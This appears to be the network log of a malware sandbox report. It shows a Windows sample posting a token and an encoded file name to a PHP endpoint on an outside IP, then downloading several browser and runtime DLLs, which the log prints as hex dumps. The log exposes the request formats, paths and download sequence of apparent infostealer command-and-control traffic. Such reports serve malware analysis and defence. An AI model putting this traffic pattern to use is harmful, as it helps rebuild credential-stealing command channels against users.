                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.213994980 CET563OUTPOST /18a9a962225b1ffb.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FIJJKECFCFBGDHIECAAF
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Content-Length: 363
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 35 63 66 65 31 32 62 31 37 66 31 38 62 64 34 35 35 65 39 63 31 37 63 37 36 38 32 35 33 31 61 35 35 62 64 66 38 35 64 36 39 32 38 33 30 38 61 37 65 66 64 35 36 61 33 32 35 32 30 32 61 35 66 30 38 66 35 65 63 33 30 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                Data Ascii: ------FIJJKECFCFBGDHIECAAFContent-Disposition: form-data; name="token"f5cfe12b17f18bd455e9c17c7682531a55bdf85d6928308a7efd56a325202a5f08f5ec30------FIJJKECFCFBGDHIECAAFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FIJJKECFCFBGDHIECAAFContent-Disposition: form-data; name="file"------FIJJKECFCFBGDHIECAAF--
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:27.457607985 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:27 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.035815001 CET92OUTGET /4db719b1f2f948b0/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.274466038 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:28 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "a7550-5e7ebd4425100"
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                Content-Length: 685392
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.274590015 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b
                                                                                                                                                                                                                                                                                                                                Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.274600983 CET424INData Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff
                                                                                                                                                                                                                                                                                                                                Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh|$,}uT$4D$0P|OL$8PVS'D$@?@L$L$D$D$D$$
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.274846077 CET1236INData Raw: 0f b6 fb 31 54 24 44 81 e1 00 ff 00 00 09 c1 09 cf 89 7c 24 40 80 7c 24 07 00 74 10 8b 5c 24 28 e9 a7 00 00 00 0f 1f 80 00 00 00 00 8b 44 24 08 80 ec 01 8b 5c 24 28 73 46 8b 44 24 0c 2c 01 89 44 24 0c 73 40 8b 44 24 10 2c 01 89 44 24 10 73 3c 8b
                                                                                                                                                                                                                                                                                                                                Data Ascii: 1T$D|$@|$t\$(D$\$(sFD$,D$s@D$,D$s<D$,sBD$,s@D$ ,D$ D$$D$$D$(D$GD$?D$D$1D$L$D$D$D$D$f.DD$HjD$DPjL$HQPt$@m
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.274857998 CET1236INData Raw: 07 00 00 00 29 c8 c1 f8 1f f7 d0 8b 4d 1c 80 7c 31 f0 01 19 c9 09 c1 85 ca 74 2f 8b 45 10 8b 55 d0 89 10 b9 03 e0 ff ff 3b 55 14 8b 5d d4 77 22 31 ff 8b 45 0c 39 c6 74 3a 52 56 50 e8 20 01 08 00 eb 2d bf ff ff ff ff eb 3a b9 02 e0 ff ff 8b 5d d4
                                                                                                                                                                                                                                                                                                                                Data Ascii: )M|1t/EU;U]w"1E9t:RVP -:]QsE9uSjPEtSP\M1$^_[]USWVut:}t$FHjShjVPt^_[]^_[]USWV}
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.274868965 CET1236INData Raw: 0a 10 6a 01 57 ff d1 83 c4 08 68 0c 01 00 00 6a 00 56 e8 34 fc 07 00 83 c4 0c eb 25 85 ff 74 15 89 c8 89 f1 89 d6 8b 55 10 56 50 e8 64 fc ff ff 83 c4 10 eb 6e 8d 46 08 89 45 ec 8b 46 08 89 45 f0 c7 46 08 00 00 00 00 89 5e 04 8b 4b 04 ff 15 00 80
                                                                                                                                                                                                                                                                                                                                Data Ascii: jWhjV4%tUVPdnFEFEF^Kt=Uuu#t>t FHjWEM1^_[]USWVu>FHW>FHXSVW^_[]
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.274882078 CET1236INData Raw: 8b 75 0c 56 ff 75 08 57 e8 ac f7 07 00 83 c4 0c 01 f7 29 f3 39 f3 77 e8 53 ff 75 08 57 e8 97 f7 07 00 83 c4 0c 0f b6 8d f0 fe ff ff 8b b5 ec fe ff ff 8a 04 0e 88 06 c6 04 0e 00 b8 02 00 00 00 0f b6 54 06 ff 0f b6 f9 01 d7 0f b6 8c 05 ef fe ff ff
                                                                                                                                                                                                                                                                                                                                Data Ascii: uVuW)9wSuWT>\>=t%>>fM1^_[]U}thuo]UVuE9sh;
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.275579929 CET848INData Raw: 66 0f 6e 34 07 66 0f ef db 66 0f 60 f3 66 0f 61 f3 66 0f 6f f8 66 0f 72 f7 17 66 0f 6f 1d e0 20 08 10 66 0f fe fb f3 0f 5b ff 66 0f 70 e6 f5 66 0f f4 f7 66 0f 70 ef f5 66 0f f4 ec 66 0f 6f e0 66 0f fe 25 d0 20 08 10 66 0f 70 fe e8 66 0f 70 ed e8
                                                                                                                                                                                                                                                                                                                                Data Ascii: fn4ff`fafofrfo f[fpffpffof% fpfpfbfnlff`fafffrf% [fpffpfpffpfbffof fnf`fafrfo- f[fpffpffof%!
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.275592089 CET1236INData Raw: 55 e4 8b 04 02 89 45 d4 8b 45 e8 8b 55 ec 8d 44 02 01 89 d3 0f b6 c0 8b 7d f0 0f b6 14 07 00 d1 0f b6 f1 8a 34 37 88 34 07 88 14 37 00 d6 0f b6 c6 0f b6 04 07 89 45 e0 8b 45 e8 8d 44 03 02 89 de 0f b6 c0 0f b6 14 07 00 d1 0f b6 d9 8b 7d f0 8a 34
                                                                                                                                                                                                                                                                                                                                Data Ascii: UEEUD}4747EED}4}4EUEUu}<7}<U2u4EUU}4}4E]Uu3EU
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:28.275604010 CET1236INData Raw: 8b 46 2c 89 85 cc fe ff ff 11 c1 8b 7e 4c 31 cf 8b 46 48 31 d8 81 f7 8c 68 05 9b 35 1f 6c 3e 2b 89 fb 81 c3 3b a7 ca 84 89 5d dc 89 c6 81 d6 85 ae 67 bb 89 75 d8 89 da 33 95 c8 fe ff ff 89 f3 33 9d cc fe ff ff 89 d6 0f a4 de 08 0f a4 d3 08 89 9d
                                                                                                                                                                                                                                                                                                                                Data Ascii: F,~L1FH1h5l>+;]gu33`tSUSU`UM11UTEEMM11E`tS LAS$A


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                3192.168.2.54987577.83.175.105803552C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:35.539526939 CET92OUTGET /4db719b1f2f948b0/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.389846087 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:36 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "94750-5e7ebd4425100"
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                Content-Length: 608080
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.390326023 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 5d e9 07 ba 01 00 cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 40 89 ce a1 0c e0 08 10 31 e8 89 44 24 38 8b
                                                                                                                                                                                                                                                                                                                                Data Ascii: U]USWV@1D$8=|$D$I1J1;OBuN1;Ore$@DN1;OBu!N1;Os@utu9G$
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.390337944 CET1236INData Raw: e3 fe 83 e7 01 09 df 89 7a 0c 89 56 08 8b 39 83 e7 01 09 f7 89 39 80 4a 0c 01 83 c4 04 5e 5f 5b 5d c3 83 c9 01 89 4e 0c 8b 4e 08 85 c9 75 23 8b 72 0c 89 f1 83 e1 fe 0f 84 b0 00 00 00 8b 79 08 83 e7 fe 83 e6 01 09 fe 89 72 0c 89 51 08 89 08 eb c8
                                                                                                                                                                                                                                                                                                                                Data Ascii: zV99J^_[]NNu#ryrQYtYJqryyzt]^zVQQiZ]Y]Yg~tY~qJ
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.392508984 CET1236INData Raw: 0c 8b 4e 08 83 c9 01 89 4a 0c 89 56 08 89 30 5e 5f 5b 5d c3 89 72 0c eb f6 c7 05 f4 f8 08 10 a2 23 08 10 cc b9 b6 00 00 00 e8 3a b2 03 00 83 cf 01 89 7a 0c c7 05 f4 f8 08 10 a2 23 08 10 cc b9 a0 00 00 00 e8 1f b2 03 00 cc cc cc cc cc cc cc 55 89
                                                                                                                                                                                                                                                                                                                                Data Ascii: NJV0^_[]r#:z#USWVP2Fp8tGz~Hep2ppzz88J^
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.392519951 CET1236INData Raw: ad 03 00 c7 02 00 00 00 00 c7 05 f4 f8 08 10 a2 23 08 10 cc b9 a9 00 00 00 e8 76 ad 03 00 8b 42 04 83 e0 01 89 46 04 c7 05 f4 f8 08 10 a2 23 08 10 cc b9 b6 00 00 00 e8 58 ad 03 00 55 89 e5 53 57 56 83 ec 10 89 4d e4 a1 0c e0 08 10 31 e8 89 45 f0
                                                                                                                                                                                                                                                                                                                                Data Ascii: #vBF#XUSWVM1E9Bh0,,hUEPji}Et}CsMKADP0\v
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.394874096 CET1236INData Raw: a6 9f 07 00 8b 54 24 20 83 c4 0c 89 74 24 18 8b 46 18 01 d0 29 c3 8d 47 ff 85 c7 0f 95 c0 85 ff 0f 94 c1 08 c1 75 78 89 f8 83 c8 01 0f bd c8 d3 eb 89 7c 24 1c 89 d8 c1 e8 05 3b 42 04 0f 82 70 01 00 00 8b 7c 82 0c 31 f6 46 89 d9 d3 e6 0f a3 df 0f
                                                                                                                                                                                                                                                                                                                                Data Ascii: T$ t$F)Gux|$;Bp|1F<|BHJ\$;KAT$|$tJ)z,t$(L$@1ae^_[]th;D$tNL$9x8
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.394885063 CET1236INData Raw: fe ff ff 8b 1a 85 db 0f 85 26 04 00 00 8b 44 24 08 39 10 89 c2 0f 85 0a 05 00 00 89 0a 8b 4c 24 0c 8b 5c 24 18 8b 54 24 14 8b 44 24 30 89 43 04 31 ff 89 3e 8b 74 24 10 8b 44 24 24 89 7c 86 14 8b 7c 24 1c 6a 01 e8 09 60 02 00 8b 54 24 10 83 c4 04
                                                                                                                                                                                                                                                                                                                                Data Ascii: &D$9L$\$T$D$0C1>t$D$$||$j`T$KQL$0D$$@T$DL$0D$DBWW9GQQOT$49:Y9
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.397252083 CET1236INData Raw: 00 8b 31 83 e6 fe 83 e0 01 09 f0 89 42 04 89 11 8d 54 24 30 89 0a e9 d1 fc ff ff 83 c9 01 89 4e 04 8b 06 85 c0 74 08 8b 48 04 f6 c1 01 75 6f 8b 42 04 89 c1 83 e1 fe 0f 84 67 02 00 00 8b 31 83 e6 fe 83 e0 01 09 f0 89 42 04 89 11 e9 b3 fa ff ff 83
                                                                                                                                                                                                                                                                                                                                Data Ascii: 1BT$0NtHuoBg1BBBqq`G1G9"HAqqZ0Zqq
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.397263050 CET1236INData Raw: 9a 03 00 31 c0 89 44 24 17 89 44 24 14 31 d2 31 c9 31 db eb 97 cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f0 81 ec 90 00 00 00 89 cf a1 0c e0 08 10 31 e8 89 84 24 88 00 00 00 a1 00 f7 08 10 8b 0d c8 e3 08 10 64 8b 15 2c 00 00 00 8b 0c 8a 3b 81
                                                                                                                                                                                                                                                                                                                                Data Ascii: 1D$D$111USWV1$d,;~lhy=uVhNt+hoPdu5<hx|$\$XS#D$@jP(f
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.399612904 CET1236INData Raw: 44 24 10 8b 4c 24 14 89 0d 0c e2 08 10 a3 08 e2 08 10 31 c0 8d 4c 24 20 89 01 8d 74 24 1c 89 06 8d 44 24 18 50 56 51 ff 15 74 be 08 10 8b 06 85 c0 0f 84 b5 02 00 00 48 b9 59 17 b7 d1 f7 e1 c1 ea 0d 69 da 10 27 00 00 b9 10 27 00 00 01 cb 8b 35 08
                                                                                                                                                                                                                                                                                                                                Data Ascii: D$L$1L$ t$D$PVQtHYi''5=<$jQRP'tp<$ii2k2x|1N\$
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:36.399624109 CET1236INData Raw: df 0f 43 fb 68 00 40 00 00 57 56 ff 15 30 bf 08 10 85 c0 0f 84 4d 02 00 00 01 fe 29 fb b8 00 00 10 00 39 c3 bf 00 00 10 00 0f 42 fb 85 db 75 d4 68 84 e7 08 10 ff 15 30 be 08 10 a1 2c e7 08 10 85 c0 0f 84 f1 01 00 00 89 45 e8 8b 00 a3 2c e7 08 10
                                                                                                                                                                                                                                                                                                                                Data Ascii: Ch@WV0M)9Buh0,E,hh0tLEU1y19GuIuIt{9]ECECCE
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.135596991 CET93OUTGET /4db719b1f2f948b0/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:39.377015114 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:39 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "6dde8-5e7ebd4425100"
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                Content-Length: 450024
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:40.673307896 CET89OUTGET /4db719b1f2f948b0/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:40.916273117 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:40 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "1f3950-5e7ebd4425100"
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                Content-Length: 2046288
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.633898020 CET93OUTGET /4db719b1f2f948b0/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:43.876991987 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:43 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "3ef50-5e7ebd4425100"
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                Content-Length: 257872
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:44.173266888 CET97OUTGET /4db719b1f2f948b0/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: 77.83.175.105
